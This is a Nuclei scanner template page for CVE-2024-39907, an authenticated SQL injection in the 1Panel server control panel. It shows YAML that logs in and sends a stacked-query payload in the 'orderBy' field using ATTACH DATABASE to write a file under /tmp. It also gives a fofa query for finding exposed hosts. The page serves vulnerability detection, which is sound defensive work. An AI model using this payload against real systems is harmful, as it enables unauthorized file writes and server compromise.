Skip to content
Nuclei Templates

1Panel SQL Injection - Authenticated

ID: CVE-2024-39907

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,sqli,1panel,authenticated

Description

Section titled “Description”

1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.

YAML Source

Section titled “YAML Source”
id: CVE-2024-39907


info:
  name: 1Panel SQL Injection - Authenticated
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
  reference:
    - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39907
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09387
    cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
    product: 1panel
    vendor: fit2cloud
  tags: cve,cve2024,sqli,1panel,authenticated


variables:
  username: "{{username}}"
  password: "{{password}}"


http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        EntranceCode: ZW50cmFuY2U=
        Content-Type: application/json


        {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}


      - |
        POST /api/v1/hosts/command/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2, "SQL logic error","table exp already exists")
          - contains(header_1, 'psession')
        condition: and
# digest: 490a004630440220377d52c7bbaab2e72e490454b166a373b80a857f1d819cc5cbf643c200786a4502204ef4821cfc1ad75877498dd46577f33d393483a0d1d9f0284d00692a2a7b5604:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39907.yaml"

View on Github